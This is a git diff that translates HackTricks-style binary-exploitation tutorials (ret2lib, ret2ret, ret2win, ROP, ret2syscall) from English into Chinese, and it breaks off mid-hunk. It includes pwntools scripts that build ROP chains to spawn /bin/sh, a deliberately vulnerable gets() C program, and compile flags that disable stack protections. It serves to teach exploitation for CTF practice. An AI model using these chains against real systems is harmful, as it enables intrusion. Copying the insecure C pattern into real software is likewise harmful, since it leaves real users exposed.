-    log.info("bin/sh %s " % hex(BINSH))
-    log.info("system %s " % hex(SYSTEM))
-    log.info("exit %s " % hex(EXIT))
+log.info("POP_RDI %s " % hex(POP_RDI))
+log.info("bin/sh %s " % hex(BINSH))
+log.info("system %s " % hex(SYSTEM))
+log.info("exit %s " % hex(EXIT))
 
-    rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) #p64(EXIT)
-    rop2 = generate_payload_aligned(rop2)
+rop2 = p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) #p64(EXIT)
+rop2 = generate_payload_aligned(rop2)
 
 
 print(P.clean())
@@ -183,38 +182,30 @@ P.sendline(rop2)
 
 P.interactive() #Interact with your shell :)
 ```
+# 常见问题
 
-# Common problems
-
-## MAIN_PLT = elf.symbols\['main'] not found
-
-If the "main" symbol does not exist (probably because it's a stripped binary). Then you can just where is the main code:
+## MAIN_PLT = elf.symbols\['main'] 未找到
 
+如果 "main" 符号不存在（可能是因为它是一个剥离的二进制文件）。那么你可以直接查看主代码在哪里：
 ```python
 objdump -d vuln_binary | grep "\.text"
 Disassembly of section .text:
 0000000000401080 <.text>:
 ```
-
-and set the address manually:
-
+并手动设置地址：
 ```python
 MAIN_PLT = 0x401080
 ```
+## Puts未找到
 
-## Puts not found
+如果二进制文件没有使用Puts，您应该检查它是否使用
 
-If the binary is not using Puts you should check if it is using
+## `sh: 1: %s%s%s%s%s%s%s%s: 未找到`
 
-## `sh: 1: %s%s%s%s%s%s%s%s: not found`
-
-If you find this **error** after creating **all** the exploit: `sh: 1: %s%s%s%s%s%s%s%s: not found`
-
-Try to **subtract 64 bytes to the address of "/bin/sh"**:
+如果在创建**所有**漏洞利用后发现此**错误**：`sh: 1: %s%s%s%s%s%s%s%s: 未找到`
 
+尝试**将“/bin/sh”的地址减去64字节**：
 ```python
 BINSH = next(libc.search("/bin/sh")) - 64
 ```
-
 {{#include ../../../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2ret.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2ret.md
index dfb290e28..e13aeff14 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2ret.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2ret.md
@@ -4,31 +4,30 @@
 
 ## Ret2ret
 
-The main goal of this technique is to try to **bypass ASLR by abusing an existing pointer in the stack**.
+这个技术的主要目标是尝试**通过滥用栈中现有指针来绕过 ASLR**。
 
-Basically, stack overflows are usually caused by strings, and **strings end with a null byte at the end** in memory. This allows to try to reduce the place pointed by na existing pointer already existing n the stack. So if the stack contained `0xbfffffdd`, this overflow could transform it into `0xbfffff00` (note the last zeroed byte).
+基本上，栈溢出通常是由字符串引起的，而**字符串在内存中以一个空字节结尾**。这允许尝试减少由栈中已存在的指针指向的位置。因此，如果栈包含 `0xbfffffdd`，这个溢出可以将其转换为 `0xbfffff00`（注意最后一个零字节）。
 
-If that address points to our shellcode in the stack, it's possible to make the flow reach that address by **adding addresses to the `ret` instruction** util this one is reached.
+如果该地址指向我们在栈中的 shellcode，可以通过**向 `ret` 指令添加地址**使流程到达该地址，直到到达该地址。
 
-Therefore the attack would be like this:
+因此，攻击将是这样的：
 
 - NOP sled
 - Shellcode
-- Overwrite the stack from the EIP with **addresses to `ret`** (RET sled)
-- 0x00 added by the string modifying an address from the stack making it point to the NOP sled
+- 从 EIP 开始覆盖栈，使用**指向 `ret` 的地址**（RET sled）
+- 由字符串添加的 0x00 修改栈中的一个地址，使其指向 NOP sled
 
-Following [**this link**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2ret.c) you can see an example of a vulnerable binary and [**in this one**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2retexploit.c) the exploit.
+通过[**这个链接**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2ret.c)你可以看到一个易受攻击的二进制文件，和[**这个链接**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2retexploit.c)中的利用。
 
 ## Ret2pop
 
-In case you can find a **perfect pointer in the stack that you don't want to modify** (in `ret2ret` we changes the final lowest byte to `0x00`), you can perform the same `ret2ret` attack, but the **length of the RET sled must be shorted by 1** (so the final `0x00` overwrites the data just before the perfect pointer), and the **last** address of the RET sled must point to **`pop <reg>; ret`**.\
-This way, the **data before the perfect pointer will be removed** from the stack (this is the data affected by the `0x00`) and the **final `ret` will point to the perfect address** in the stack without any change.
+如果你能找到一个**完美的栈指针而不想修改**（在 `ret2ret` 中我们将最后一个最低字节改为 `0x00`），你可以执行相同的 `ret2ret` 攻击，但**RET sled 的长度必须缩短 1**（这样最后的 `0x00` 会覆盖完美指针之前的数据），并且**RET sled 的最后**地址必须指向**`pop <reg>; ret`**。\
+这样，**完美指针之前的数据将从栈中移除**（这是受 `0x00` 影响的数据），并且**最终的 `ret` 将指向栈中的完美地址**而没有任何变化。
 
-Following [**this link**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2pop.c) you can see an example of a vulnerable binary and [**in this one** ](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2popexploit.c)the exploit.
+通过[**这个链接**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2pop.c)你可以看到一个易受攻击的二进制文件，和[**这个链接**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2popexploit.c)中的利用。
 
 ## References
 
 - [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2win.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2win.md
index eac6e55ee..3d5c259e4 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2win.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2win.md
@@ -2,49 +2,44 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-**Ret2win** challenges are a popular category in **Capture The Flag (CTF)** competitions, particularly in tasks that involve **binary exploitation**. The goal is to exploit a vulnerability in a given binary to execute a specific, uninvoked function within the binary, often named something like `win`, `flag`, etc. This function, when executed, usually prints out a flag or a success message. The challenge typically involves overwriting the **return address** on the stack to divert execution flow to the desired function. Here's a more detailed explanation with examples:
+**Ret2win** 挑战是 **Capture The Flag (CTF)** 竞赛中一个受欢迎的类别，特别是在涉及 **binary exploitation** 的任务中。目标是利用给定二进制文件中的漏洞，执行二进制文件中一个特定的、未被调用的函数，通常命名为 `win`、`flag` 等。当这个函数被执行时，通常会打印出一个标志或成功消息。挑战通常涉及覆盖栈上的 **return address**，以将执行流转向所需的函数。以下是更详细的解释和示例：
 
-### C Example
-
-Consider a simple C program with a vulnerability and a `win` function that we intend to call:
+### C 示例
 
+考虑一个简单的 C 程序，其中存在一个漏洞和一个我们打算调用的 `win` 函数：
 ```c
 #include <stdio.h>
 #include <string.h>
 
 void win() {
-    printf("Congratulations! You've called the win function.\n");
+printf("Congratulations! You've called the win function.\n");
 }
 
 void vulnerable_function() {
-    char buf[64];
-    gets(buf); // This function is dangerous because it does not check the size of the input, leading to buffer overflow.
+char buf[64];
+gets(buf); // This function is dangerous because it does not check the size of the input, leading to buffer overflow.
 }
 
 int main() {
-    vulnerable_function();
-    return 0;
+vulnerable_function();
+return 0;
 }
 ```
-
-To compile this program without stack protections and with **ASLR** disabled, you can use the following command:
-
+要在没有栈保护和禁用 **ASLR** 的情况下编译此程序，可以使用以下命令：
 ```sh
 gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c
 ```
+- `-m32`: 将程序编译为 32 位二进制文件（这不是必需的，但在 CTF 挑战中很常见）。
+- `-fno-stack-protector`: 禁用对栈溢出的保护。
+- `-z execstack`: 允许在栈上执行代码。
+- `-no-pie`: 禁用位置无关可执行文件，以确保 `win` 函数的地址不变。
+- `-o vulnerable`: 将输出文件命名为 `vulnerable`。
 
-- `-m32`: Compile the program as a 32-bit binary (this is optional but common in CTF challenges).
-- `-fno-stack-protector`: Disable protections against stack overflows.
-- `-z execstack`: Allow execution of code on the stack.
-- `-no-pie`: Disable Position Independent Executable to ensure that the address of the `win` function does not change.
-- `-o vulnerable`: Name the output file `vulnerable`.
-
-### Python Exploit using Pwntools
-
-For the exploit, we'll use **pwntools**, a powerful CTF framework for writing exploits. The exploit script will create a payload to overflow the buffer and overwrite the return address with the address of the `win` function.
+### 使用 Pwntools 的 Python 利用
 
+对于利用，我们将使用 **pwntools**，这是一个强大的 CTF 框架，用于编写利用脚本。利用脚本将创建一个有效负载，以溢出缓冲区并用 `win` 函数的地址覆盖返回地址。
 ```python
 from pwn import *
 
@@ -64,37 +59,33 @@ payload = b'A' * 68 + win_addr
 p.sendline(payload)
 p.interactive()
 ```
-
-To find the address of the `win` function, you can use **gdb**, **objdump**, or any other tool that allows you to inspect binary files. For instance, with `objdump`, you could use:
-
+要找到 `win` 函数的地址，您可以使用 **gdb**、**objdump** 或任何其他允许您检查二进制文件的工具。例如，使用 `objdump`，您可以使用：
 ```sh
 objdump -d vulnerable | grep win
 ```
+该命令将显示 `win` 函数的汇编代码，包括其起始地址。&#x20;
 
-This command will show you the assembly of the `win` function, including its starting address.&#x20;
+Python 脚本发送一个精心制作的消息，当 `vulnerable_function` 处理时，会溢出缓冲区并用 `win` 的地址覆盖栈上的返回地址。当 `vulnerable_function` 返回时，它不会返回到 `main` 或退出，而是跳转到 `win`，并打印消息。
 
-The Python script sends a carefully crafted message that, when processed by the `vulnerable_function`, overflows the buffer and overwrites the return address on the stack with the address of `win`. When `vulnerable_function` returns, instead of returning to `main` or exiting, it jumps to `win`, and the message is printed.
+## 保护措施
 
-## Protections
+- [**PIE**](../common-binary-protections-and-bypasses/pie/) **应该禁用**，以确保地址在执行之间是可靠的，否则函数存储的地址可能并不总是相同，您需要一些泄漏信息来确定 `win` 函数加载的位置。在某些情况下，当导致溢出的函数是 `read` 或类似函数时，您可以进行 **部分覆盖** 1 或 2 个字节，以将返回地址更改为 `win` 函数。由于 ASLR 的工作原理，最后三个十六进制半字节不会随机化，因此有 **1/16 的机会**（1 个半字节）获得正确的返回地址。
+- [**栈金丝雀**](../common-binary-protections-and-bypasses/stack-canaries/) 也应该禁用，否则被破坏的 EIP 返回地址将永远不会被跟随。
 
-- [**PIE**](../common-binary-protections-and-bypasses/pie/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded. In some cases, when the function that causes the overflow is `read` or similar, you can do a **Partial Overwrite** of 1 or 2 bytes to change the return address to be the win function. Because of how ASLR works, the last three hex nibbles are not randomized, so there is a **1/16 chance** (1 nibble) to get the correct return address.
-- [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed.
-
-## Other examples & References
+## 其他示例与参考
 
 - [https://ir0nstone.gitbook.io/notes/types/stack/ret2win](https://ir0nstone.gitbook.io/notes/types/stack/ret2win)
 - [https://guyinatuxedo.github.io/04-bof_variable/tamu19_pwn1/index.html](https://guyinatuxedo.github.io/04-bof_variable/tamu19_pwn1/index.html)
-  - 32bit, no ASLR
+- 32位，无 ASLR
 - [https://guyinatuxedo.github.io/05-bof_callfunction/csaw16_warmup/index.html](https://guyinatuxedo.github.io/05-bof_callfunction/csaw16_warmup/index.html)
-  - 64 bits with ASLR, with a leak of the bin address
+- 64 位，带 ASLR，带有二进制地址泄漏
 - [https://guyinatuxedo.github.io/05-bof_callfunction/csaw18_getit/index.html](https://guyinatuxedo.github.io/05-bof_callfunction/csaw18_getit/index.html)
-  - 64 bits, no ASLR
+- 64 位，无 ASLR
 - [https://guyinatuxedo.github.io/05-bof_callfunction/tu17_vulnchat/index.html](https://guyinatuxedo.github.io/05-bof_callfunction/tu17_vulnchat/index.html)
-  - 32 bits, no ASLR, double small overflow, first to overflow the stack and enlarge the size of the second overflow
+- 32 位，无 ASLR，双小溢出，第一次溢出栈并增大第二次溢出的大小
 - [https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html](https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html)
-  - 32 bit, relro, no canary, nx, no pie, format string to overwrite the address `fflush` with the win function (ret2win)
+- 32 位，relro，无金丝雀，nx，无 pie，格式字符串覆盖地址 `fflush` 为 `win` 函数 (ret2win)
 - [https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/](https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/)
-  - 64 bit, relro, no canary, nx, pie. Partial overwrite to call the win function (ret2win)
+- 64 位，relro，无金丝雀，nx，pie。部分覆盖以调用 `win` 函数 (ret2win)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-return-oriented-programing.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-return-oriented-programing.md
index c7271512d..be269311a 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-return-oriented-programing.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-return-oriented-programing.md
@@ -2,45 +2,44 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## **Basic Information**
+## **基本信息**
 
-**Return-Oriented Programming (ROP)** is an advanced exploitation technique used to circumvent security measures like **No-Execute (NX)** or **Data Execution Prevention (DEP)**. Instead of injecting and executing shellcode, an attacker leverages pieces of code already present in the binary or in loaded libraries, known as **"gadgets"**. Each gadget typically ends with a `ret` instruction and performs a small operation, such as moving data between registers or performing arithmetic operations. By chaining these gadgets together, an attacker can construct a payload to perform arbitrary operations, effectively bypassing NX/DEP protections.
+**返回导向编程 (ROP)** 是一种高级利用技术，用于绕过安全措施，如 **不可执行 (NX)** 或 **数据执行防护 (DEP)**。攻击者不通过注入和执行 shellcode，而是利用二进制文件或已加载库中已经存在的代码片段，称为 **"gadgets"**。每个 gadget 通常以 `ret` 指令结束，并执行小的操作，例如在寄存器之间移动数据或执行算术运算。通过将这些 gadgets 链接在一起，攻击者可以构造一个有效的有效负载，以执行任意操作，从而有效绕过 NX/DEP 保护。
 
-### How ROP Works
+### ROP 的工作原理
 
-1. **Control Flow Hijacking**: First, an attacker needs to hijack the control flow of a program, typically by exploiting a buffer overflow to overwrite a saved return address on the stack.
-2. **Gadget Chaining**: The attacker then carefully selects and chains gadgets to perform the desired actions. This could involve setting up arguments for a function call, calling the function (e.g., `system("/bin/sh")`), and handling any necessary cleanup or additional operations.
-3. **Payload Execution**: When the vulnerable function returns, instead of returning to a legitimate location, it starts executing the chain of gadgets.
+1. **控制流劫持**：首先，攻击者需要劫持程序的控制流，通常通过利用缓冲区溢出来覆盖栈上的保存返回地址。
+2. **Gadget 链接**：攻击者然后仔细选择并链接 gadgets 以执行所需的操作。这可能涉及设置函数调用的参数，调用函数（例如 `system("/bin/sh")`），并处理任何必要的清理或附加操作。
+3. **有效负载执行**：当易受攻击的函数返回时，而不是返回到合法位置，它开始执行 gadgets 链。
 
-### Tools
+### 工具
 
-Typically, gadgets can be found using **[ROPgadget](https://github.com/JonathanSalwan/ROPgadget)**, **[ropper](https://github.com/sashs/Ropper)** or directly from **pwntools** ([ROP](https://docs.pwntools.com/en/stable/rop/rop.html)).
+通常，可以使用 **[ROPgadget](https://github.com/JonathanSalwan/ROPgadget)**、**[ropper](https://github.com/sashs/Ropper)** 或直接从 **pwntools** ([ROP](https://docs.pwntools.com/en/stable/rop/rop.html)) 找到 gadgets。
 
-## ROP Chain in x86 Example
+## x86 示例中的 ROP 链
 
-### **x86 (32-bit) Calling conventions**
+### **x86 (32位) 调用约定**
 
-- **cdecl**: The caller cleans the stack. Function arguments are pushed onto the stack in reverse order (right-to-left). **Arguments are pushed onto the stack from right to left.**
-- **stdcall**: Similar to cdecl, but the callee is responsible for cleaning the stack.
+- **cdecl**：调用者清理栈。函数参数以反向顺序（从右到左）推入栈中。**参数从右到左推入栈中。**
+- **stdcall**：类似于 cdecl，但被调用者负责清理栈。
 
-### **Finding Gadgets**
+### **查找 Gadgets**
 
-First, let's assume we've identified the necessary gadgets within the binary or its loaded libraries. The gadgets we're interested in are:
+首先，假设我们已经在二进制文件或其加载的库中识别了必要的 gadgets。我们感兴趣的 gadgets 包括：
 
-- `pop eax; ret`: This gadget pops the top value of the stack into the `EAX` register and then returns, allowing us to control `EAX`.
-- `pop ebx; ret`: Similar to the above, but for the `EBX` register, enabling control over `EBX`.
-- `mov [ebx], eax; ret`: Moves the value in `EAX` to the memory location pointed to by `EBX` and then returns. This is often called a **write-what-where gadget**.
-- Additionally, we have the address of the `system()` function available.
+- `pop eax; ret`：此 gadget 将栈顶值弹出到 `EAX` 寄存器中，然后返回，使我们能够控制 `EAX`。
+- `pop ebx; ret`：与上述类似，但针对 `EBX` 寄存器，使我们能够控制 `EBX`。
+- `mov [ebx], eax; ret`：将 `EAX` 中的值移动到 `EBX` 指向的内存位置，然后返回。这通常被称为 **write-what-where gadget**。
+- 此外，我们还有 `system()` 函数的地址可用。
 
-### **ROP Chain**
+### **ROP 链**
 
-Using **pwntools**, we prepare the stack for the ROP chain execution as follows aiming to execute `system('/bin/sh')`, note how the chain starts with:
-
-1. A `ret` instruction for alignment purposes (optional)
-2. Address of `system` function (supposing ASLR disabled and known libc, more info in [**Ret2lib**](ret2lib/))
-3. Placeholder for the return address from `system()`
-4. `"/bin/sh"` string address (parameter for system function)
+使用 **pwntools**，我们准备栈以执行 ROP 链，目标是执行 `system('/bin/sh')`，注意链的开始：
 
+1. 一个 `ret` 指令用于对齐（可选）
+2. `system` 函数的地址（假设 ASLR 被禁用且已知 libc，更多信息见 [**Ret2lib**](ret2lib/)）
+3. `system()` 的返回地址占位符
+4. `"/bin/sh"` 字符串地址（system 函数的参数）
 ```python
 from pwn import *
 
@@ -59,10 +58,10 @@ ret_gadget = 0xcafebabe  # This could be any gadget that allows us to control th
 
 # Construct the ROP chain
 rop_chain = [
-    ret_gadget,    # This gadget is used to align the stack if necessary, especially to bypass stack alignment issues
-    system_addr,   # Address of system(). Execution will continue here after the ret gadget
-    0x41414141,    # Placeholder for system()'s return address. This could be the address of exit() or another safe place.
-    bin_sh_addr    # Address of "/bin/sh" string goes here, as the argument to system()
+ret_gadget,    # This gadget is used to align the stack if necessary, especially to bypass stack alignment issues
+system_addr,   # Address of system(). Execution will continue here after the ret gadget
+0x41414141,    # Placeholder for system()'s return address. This could be the address of exit() or another safe place.
+bin_sh_addr    # Address of "/bin/sh" string goes here, as the argument to system()
 ]
 
 # Flatten the rop_chain for use
@@ -74,28 +73,26 @@ payload = fit({offset: rop_chain})
 p.sendline(payload)
 p.interactive()
 ```
-
 ## ROP Chain in x64 Example
 
-### **x64 (64-bit) Calling conventions**
+### **x64 (64-bit) 调用约定**
 
-- Uses the **System V AMD64 ABI** calling convention on Unix-like systems, where the **first six integer or pointer arguments are passed in the registers `RDI`, `RSI`, `RDX`, `RCX`, `R8`, and `R9`**. Additional arguments are passed on the stack. The return value is placed in `RAX`.
-- **Windows x64** calling convention uses `RCX`, `RDX`, `R8`, and `R9` for the first four integer or pointer arguments, with additional arguments passed on the stack. The return value is placed in `RAX`.
-- **Registers**: 64-bit registers include `RAX`, `RBX`, `RCX`, `RDX`, `RSI`, `RDI`, `RBP`, `RSP`, and `R8` to `R15`.
+- 在类Unix系统上使用 **System V AMD64 ABI** 调用约定，其中 **前六个整数或指针参数通过寄存器 `RDI`, `RSI`, `RDX`, `RCX`, `R8` 和 `R9` 传递**。额外的参数通过栈传递。返回值放在 `RAX` 中。
+- **Windows x64** 调用约定使用 `RCX`, `RDX`, `R8` 和 `R9` 作为前四个整数或指针参数，额外的参数通过栈传递。返回值放在 `RAX` 中。
+- **寄存器**：64位寄存器包括 `RAX`, `RBX`, `RCX`, `RDX`, `RSI`, `RDI`, `RBP`, `RSP` 和 `R8` 到 `R15`。
 
-#### **Finding Gadgets**
+#### **查找小工具**
 
-For our purpose, let's focus on gadgets that will allow us to set the **RDI** register (to pass the **"/bin/sh"** string as an argument to **system()**) and then call the **system()** function. We'll assume we've identified the following gadgets:
+为了我们的目的，让我们专注于可以让我们设置 **RDI** 寄存器（将 **"/bin/sh"** 字符串作为参数传递给 **system()**）并调用 **system()** 函数的小工具。我们假设我们已经识别出以下小工具：
 
-- **pop rdi; ret**: Pops the top value of the stack into **RDI** and then returns. Essential for setting our argument for **system()**.
-- **ret**: A simple return, useful for stack alignment in some scenarios.
+- **pop rdi; ret**: 将栈顶值弹出到 **RDI** 中，然后返回。对于设置 **system()** 的参数至关重要。
+- **ret**: 一个简单的返回，在某些场景中对栈对齐有用。
 
-And we know the address of the **system()** function.
+我们知道 **system()** 函数的地址。
 
 ### **ROP Chain**
 
-Below is an example using **pwntools** to set up and execute a ROP chain aiming to execute **system('/bin/sh')** on **x64**:
-
+下面是一个使用 **pwntools** 设置和执行 ROP 链的示例，旨在执行 **system('/bin/sh')** 在 **x64** 上：
 ```python
 from pwn import *
 
@@ -115,10 +112,10 @@ ret_gadget = 0xdeadbeefdeadbead     # ret gadget for alignment, if necessary
 
 # Construct the ROP chain
 rop_chain = [
-    ret_gadget,        # Alignment gadget, if needed
-    pop_rdi_gadget,    # pop rdi; ret
-    bin_sh_addr,       # Address of "/bin/sh" string goes here, as the argument to system()
-    system_addr        # Address of system(). Execution will continue here.
+ret_gadget,        # Alignment gadget, if needed
+pop_rdi_gadget,    # pop rdi; ret
+bin_sh_addr,       # Address of "/bin/sh" string goes here, as the argument to system()
+system_addr        # Address of system(). Execution will continue here.
 ]
 
 # Flatten the rop_chain for use
@@ -130,52 +127,50 @@ payload = fit({offset: rop_chain})
 p.sendline(payload)
 p.interactive()
 ```
+在这个例子中：
 
-In this example:
+- 我们利用 **`pop rdi; ret`** gadget 将 **`RDI`** 设置为 **`"/bin/sh"`** 的地址。
+- 在设置 **`RDI`** 后，我们直接跳转到 **`system()`**，链中包含 **system()** 的地址。
+- 如果目标环境需要，使用 **`ret_gadget`** 进行对齐，这在 **x64** 中更为常见，以确保在调用函数之前正确对齐栈。
 
-- We utilize the **`pop rdi; ret`** gadget to set **`RDI`** to the address of **`"/bin/sh"`**.
-- We directly jump to **`system()`** after setting **`RDI`**, with **system()**'s address in the chain.
-- **`ret_gadget`** is used for alignment if the target environment requires it, which is more common in **x64** to ensure proper stack alignment before calling functions.
+### 栈对齐
 
-### Stack Alignment
+**x86-64 ABI** 确保在执行 **call instruction** 时 **栈是16字节对齐** 的。**LIBC** 为了优化性能，**使用 SSE 指令**（如 **movaps**），这需要这种对齐。如果栈没有正确对齐（意味着 **RSP** 不是16的倍数），对 **system** 等函数的调用将在 **ROP chain** 中失败。要解决此问题，只需在 ROP chain 中调用 **system** 之前添加一个 **ret gadget**。
 
-**The x86-64 ABI** ensures that the **stack is 16-byte aligned** when a **call instruction** is executed. **LIBC**, to optimize performance, **uses SSE instructions** (like **movaps**) which require this alignment. If the stack isn't aligned properly (meaning **RSP** isn't a multiple of 16), calls to functions like **system** will fail in a **ROP chain**. To fix this, simply add a **ret gadget** before calling **system** in your ROP chain.
-
-## x86 vs x64 main difference
+## x86 与 x64 的主要区别
 
 > [!TIP]
-> Since x64 uses registers for the first few arguments, it often requires fewer gadgets than x86 for simple function calls, but finding and chaining the right gadgets can be more complex due to the increased number of registers and the larger address space. The increased number of registers and the larger address space in **x64** architecture provide both opportunities and challenges for exploit development, especially in the context of Return-Oriented Programming (ROP).
+> 由于 x64 使用寄存器处理前几个参数，因此在简单函数调用中通常需要的 gadget 比 x86 少，但由于寄存器数量增加和地址空间更大，找到和链接正确的 gadget 可能更复杂。**x64** 架构中寄存器数量的增加和地址空间的扩大为漏洞开发提供了机遇和挑战，特别是在返回导向编程（ROP）的背景下。
 
-## Protections
+## 保护措施
 
 - [**ASLR**](../common-binary-protections-and-bypasses/aslr/)
-- [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/)
+- [**栈金丝雀**](../common-binary-protections-and-bypasses/stack-canaries/)
 
-## Other Examples & References
+## 其他示例与参考
 
 - [https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/exploiting-calling-conventions](https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/exploiting-calling-conventions)
 
-## ROP based techniques
+## 基于 ROP 的技术
 
-Notice that ROP is just a technique in order to execute arbitrary code. Based in ROP a lot of Ret2XXX techniques were developed:
+请注意，ROP 只是执行任意代码的一种技术。基于 ROP 开发了许多 Ret2XXX 技术：
 
-- **Ret2lib**: Use ROP to call arbitrary functions from a loaded library with arbitrary parameters (usually something like `system('/bin/sh')`.
+- **Ret2lib**：使用 ROP 从加载的库中调用任意函数，带有任意参数（通常是类似 `system('/bin/sh')` 的东西）。
 
 {{#ref}}
 ret2lib/
 {{#endref}}
 
-- **Ret2Syscall**: Use ROP to prepare a call to a syscall, e.g. `execve`, and make it execute arbitrary commands.
+- **Ret2Syscall**：使用 ROP 准备对 syscall 的调用，例如 `execve`，并使其执行任意命令。
 
 {{#ref}}
 rop-syscall-execv.md
 {{#endref}}
 
-- **EBP2Ret & EBP Chaining**: The first will abuse EBP instead of EIP to control the flow and the second is similar to Ret2lib but in this case the flow is controlled mainly with EBP addresses (although t's also needed to control EIP).
+- **EBP2Ret & EBP 链接**：第一个将滥用 EBP 而不是 EIP 来控制流程，第二个类似于 Ret2lib，但在这种情况下，流程主要通过 EBP 地址控制（尽管也需要控制 EIP）。
 
 {{#ref}}
 stack-pivoting-ebp2ret-ebp-chaining.md
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-syscall-execv.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-syscall-execv.md
index 5ddd42e31..297a120ed 100644
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-syscall-execv.md
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-syscall-execv.md
@@ -2,26 +2,25 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-This is similar to Ret2lib, however, in this case we won't be calling a function from a library. In this case, everything will be prepared to call the syscall `sys_execve` with some arguments to execute `/bin/sh`. This technique is usually performed on binaries that are compiled statically, so there might be plenty of gadgets and syscall instructions.
+这与 Ret2lib 类似，但在这种情况下，我们不会调用库中的函数。在这种情况下，一切都将准备好调用 syscall `sys_execve`，并带有一些参数以执行 `/bin/sh`。这种技术通常在静态编译的二进制文件上执行，因此可能会有很多 gadgets 和 syscall 指令。
 
-In order to prepare the call for the **syscall** it's needed the following configuration:
+为了准备 **syscall** 的调用，需要以下配置：
 
-- `rax: 59 Specify sys_execve`
-- `rdi: ptr to "/bin/sh" specify file to execute`
-- `rsi: 0 specify no arguments passed`
-- `rdx: 0 specify no environment variables passed`
+- `rax: 59 指定 sys_execve`
+- `rdi: ptr to "/bin/sh" 指定要执行的文件`
+- `rsi: 0 指定不传递参数`
+- `rdx: 0 指定不传递环境变量`
 
-So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` (being aware of the padding needed to control the stack). For this, we need a gadget to write `/bin/sh` in a known area.
+所以，基本上需要将字符串 `/bin/sh` 写入某个地方，然后执行 `syscall`（注意控制栈所需的填充）。为此，我们需要一个 gadget 来在已知区域写入 `/bin/sh`。
 
 > [!TIP]
-> Another interesting syscall to call is **`mprotect`** which would allow an attacker to **modify the permissions of a page in memory**. This can be combined with [ret2shellcode](stack-shellcode.md).
+> 另一个有趣的 syscall 是 **`mprotect`**，这将允许攻击者 **修改内存中页面的权限**。这可以与 [ret2shellcode](stack-shellcode.md) 结合使用。
 
-## Register gadgets
-
-Let's start by finding **how to control those registers**:
+## 寄存器 gadgets
 
+让我们开始寻找 **如何控制这些寄存器**：
 ```c
 ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
 0x0000000000415664 : pop rax ; ret
@@ -29,15 +28,13 @@ ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
 0x00000000004101f3 : pop rsi ; ret
 0x00000000004498b5 : pop rdx ; ret
 ```
+通过这些地址，可以**在堆栈中写入内容并将其加载到寄存器中**。
 
-With these addresses it's possible to **write the content in the stack and load it into the registers**.
+## 写字符串
 
-## Write string
-
-### Writable memory
-
-First you need to find a writable place in the memory
+### 可写内存
 
+首先，您需要在内存中找到一个可写的位置。
 ```bash
 gef> vmmap
 [ Legend:  Code | Heap | Stack ]
@@ -46,26 +43,20 @@ Start              End                Offset             Perm Path
